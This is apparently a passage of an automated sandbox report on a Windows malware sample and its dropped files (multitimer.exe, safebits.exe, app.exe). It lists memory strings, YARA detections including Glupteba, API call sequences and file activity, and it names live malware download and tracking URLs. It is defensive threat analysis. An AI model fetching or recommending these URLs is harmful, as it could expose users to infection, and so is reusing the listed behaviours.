            Source: multitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpString found in binary or memory: https://new.multitimer.fun/eula
            Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpString found in binary or memory: https://new.multitimer.fun/marketing/creative/windows/offer_screen/default?mode=click&track_id=3
            Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpString found in binary or memory: https://new.multitimer.fun/marketing/creative/windows/offer_screen/default?mode=click&track_id=3.161
            Source: multitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpString found in binary or memory: https://new.multitimer.fun/privacy
            Source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmpString found in binary or memory: https://noteach.tech/add.php?windows=
            Source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmpString found in binary or memory: https://noteach.tech/software.php?client=
            Source: multitimer.exe, 00000004.00000003.794172433.00000000039CA000.00000004.00000001.sdmpString found in binary or memory: https://pc.inappP
            Source: multitimer.exe, 00000004.00000003.803292632.0000000003ADA000.00000004.00000001.sdmpString found in binary or memory: https://pc.inappPj2
            Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpString found in binary or memory: https://pc.inappapiurl.com
            Source: multitimer.exe, 00000002.00000002.669011505.0000000002AAE000.00000004.00000001.sdmp, multitimer.exe, 00000003.00000002.682573139.0000000002777000.00000004.00000001.sdmp, multitimer.exe, 00000008.00000002.739832286.00000000034D7000.00000004.00000001.sdmpString found in binary or memory: https://pc.inappapiurl.com/api/v1/buying/redirect/
            Source: multitimer.exe, 00000002.00000002.669112631.0000000002B34000.00000004.00000001.sdmpString found in binary or memory: https://pc.inappapiurl.com/api/v1/buying/redirect/30601988b56f78c9.53290271?sub_id_1=102&sub_id_2=&s
            Source: multitimer.exe, 00000002.00000002.669376413.0000000002C2A000.00000004.00000001.sdmpString found in binary or memory: https://pc.inappapiurl.com/api/v1/tracking/buying
            Source: multitimer.exe, 00000002.00000002.669376413.0000000002C2A000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com
            Source: multitimer.exe, 00000002.00000002.669285433.0000000002BC6000.00000004.00000001.sdmp, multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/malapps/multitimer.exe
            Source: app.exe, 00000013.00000002.878710201.00000000144B0000.00000004.00000001.sdmpString found in binary or memory: https://sndvoices.comhttps://2makestorage.comhttps://sndvoices.comhttps://2makestorage.comMicrosoft
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://sndvoices.comimage:
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)couldn
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648414766.0000000000D3D000.00000004.00000020.sdmp, multitimer.exe, 00000002.00000002.669880622.000000001B456000.00000004.00000001.sdmp, multitimer.exe, 00000004.00000003.780985692.000000001D686000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: safebits.exe, 0000000D.00000002.816810433.000000000075A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected GluptebaShow sources
            Source: Yara matchFile source: 0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000003.801926180.0000000003FA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: app.exe PID: 6452, type: MEMORY
            Source: Yara matchFile source: 19.2.app.exe.3790e50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.3790e50.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.3.app.exe.3fa0000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.3.app.exe.3fa0000.3.unpack, type: UNPACKEDPE
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010AE67A: CreateFileW,DeviceIoControl,DeviceIoControl,17_2_010AE67A
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_004AF100 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,18_2_004AF100
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.newJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile deleted: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3524.7055343Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeCode function: 1_2_00007FFA359C0E4C1_2_00007FFA359C0E4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeCode function: 1_2_00007FFA359C01A01_2_00007FFA359C01A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeCode function: 1_2_00007FFA359C02801_2_00007FFA359C0280
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeCode function: 1_2_00007FFA359C07E91_2_00007FFA359C07E9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeCode function: 1_2_00007FFA359C1F7D1_2_00007FFA359C1F7D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeCode function: 1_2_00007FFA359C0B8D1_2_00007FFA359C0B8D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeCode function: 1_2_00007FFA359C0BF01_2_00007FFA359C0BF0
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B5D9982_2_00007FFA31B5D998
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B441522_2_00007FFA31B44152
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B43DA52_2_00007FFA31B43DA5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B414E02_2_00007FFA31B414E0
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B410052_2_00007FFA31B41005
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B57FCD2_2_00007FFA31B57FCD
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B4B7D92_2_00007FFA31B4B7D9
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B460BA2_2_00007FFA31B460BA
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B44BB82_2_00007FFA31B44BB8
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B560992_2_00007FFA31B56099
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 3_2_00007FFA31B23DA53_2_00007FFA31B23DA5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 3_2_00007FFA31B26AA53_2_00007FFA31B26AA5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 3_2_00007FFA31B20F493_2_00007FFA31B20F49
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 3_2_00007FFA31B241523_2_00007FFA31B24152
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 3_2_00007FFA31B287C53_2_00007FFA31B287C5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 3_2_00007FFA31B208F63_2_00007FFA31B208F6
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 3_2_00007FFA31B260BA3_2_00007FFA31B260BA
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 3_2_00007FFA31B20FE03_2_00007FFA31B20FE0
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 3_2_00007FFA31B24BB83_2_00007FFA31B24BB8
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 8_2_00007FFA31B53DA58_2_00007FFA31B53DA5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 8_2_00007FFA31B56AA58_2_00007FFA31B56AA5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 8_2_00007FFA31B541528_2_00007FFA31B54152
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 8_2_00007FFA31B510058_2_00007FFA31B51005
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 8_2_00007FFA31B587C58_2_00007FFA31B587C5
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 8_2_00007FFA31B514E08_2_00007FFA31B514E0
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 8_2_00007FFA31B508F68_2_00007FFA31B508F6
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 8_2_00007FFA31B560BA8_2_00007FFA31B560BA
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 8_2_00007FFA31B54BB88_2_00007FFA31B54BB8
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00405E2D13_2_00405E2D
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00405CD213_2_00405CD2
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0045E82413_2_0045E824
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00494EC013_2_00494EC0
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0045965813_2_00459658
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010A555117_2_010A5551
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01054C7117_2_01054C71
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0102512417_2_01025124
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0105B05417_2_0105B054
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010460B517_2_010460B5
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010AE0E217_2_010AE0E2
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010A223817_2_010A2238
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0108D57B17_2_0108D57B
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0103F41417_2_0103F414
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0103844817_2_01038448
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0102A78217_2_0102A782
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0102666017_2_01026660
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0102A9B617_2_0102A9B6
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01040B9417_2_01040B94
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0103BB9217_2_0103BB92
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0102CBD317_2_0102CBD3
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0102EBD017_2_0102EBD0
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0102ABEA17_2_0102ABEA
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_0103DA5917_2_0103DA59
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01047D5E17_2_01047D5E
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01040CB817_2_01040CB8
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01088E2D17_2_01088E2D
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_004323D418_2_004323D4
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_004255DC18_2_004255DC
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_0040E9C418_2_0040E9C4
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: String function: 010221D0 appears 37 times
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: String function: 01043280 appears 31 times
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: String function: 00401272 appears 178 times
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: multitimer.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: tpwlxkeo40z.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: safebits.exe.11.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
            Source: jdfddn.dll.13.drStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
            Source: jdfddn.dll.13.drStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
            Source: vksqeekarkn.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: vksqeekarkn.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649314292.000000001B490000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648589527.0000000002A00000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648209813.0000000000882000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBarraNikLik.exe8 vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648630967.0000000002A60000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648630967.0000000002A60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameChichara.exe4 vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648285911.0000000000C5B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: security.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: security.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: security.dll
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeSection loaded: security.dll
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeSection loaded: security.dll
            Source: 19.2.app.exe.3d72670.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.3.app.exe.45853c0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.3.app.exe.4587620.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.2.app.exe.9e63c0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.2.app.exe.3d76210.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.3.app.exe.4581820.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.2.app.exe.9e2820.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 19.2.app.exe.9e8620.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: multitimer.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 2mqvpn30gyk.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: AwesomePoolE1.exe.11.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 89C8W4UQT.exe.14.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: uninstaller.exe.14.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: multitimer.exe.1.dr, u0003u2002.csCryptographic APIs: 'CreateDecryptor'
            Source: 2.0.multitimer.exe.470000.0.unpack, u0003u2002.csCryptographic APIs: 'CreateDecryptor'
            Source: 2.2.multitimer.exe.470000.0.unpack, u0003u2002.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.0.multitimer.exe.60000.0.unpack, u0003u2002.csCryptographic APIs: 'CreateDecryptor'
            Source: 3.2.multitimer.exe.60000.0.unpack, u0003u2002.csCryptographic APIs: 'CreateDecryptor'
            Source: 2mqvpn30gyk.exe.4.dr, Clasbas.csCryptographic APIs: 'CreateDecryptor'
            Source: 4.0.multitimer.exe.a60000.0.unpack, u0003u2002.csCryptographic APIs: 'CreateDecryptor'
            Source: 8.0.multitimer.exe.e10000.0.unpack, u0003u2002.csCryptographic APIs: 'CreateDecryptor'
            Source: 8.2.multitimer.exe.e10000.0.unpack, u0003u2002.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.0.multitimer.exe.560000.0.unpack, u0003u2002.csCryptographic APIs: 'CreateDecryptor'
            Source: 89C8W4UQT.exe.14.dr, Clasbas.csCryptographic APIs: 'CreateDecryptor'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@75/48@0/18
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_004AF100 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,18_2_004AF100
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_0041A4DC GetDiskFreeSpaceW,18_2_0041A4DC
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_004AF9D8 FindResourceW,SizeofResource,LoadResource,LockResource,18_2_004AF9D8
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeFile created: C:\Program Files\89C8W4UQTF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.logJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeMutant created: \Sessions\1\BaseNamedObjects\52b-6f11-481e-99be-b28317af8e3d
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeFile created: C:\Users\user\AppData\Local\Temp\B1S206CRD5Jump to behavior
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
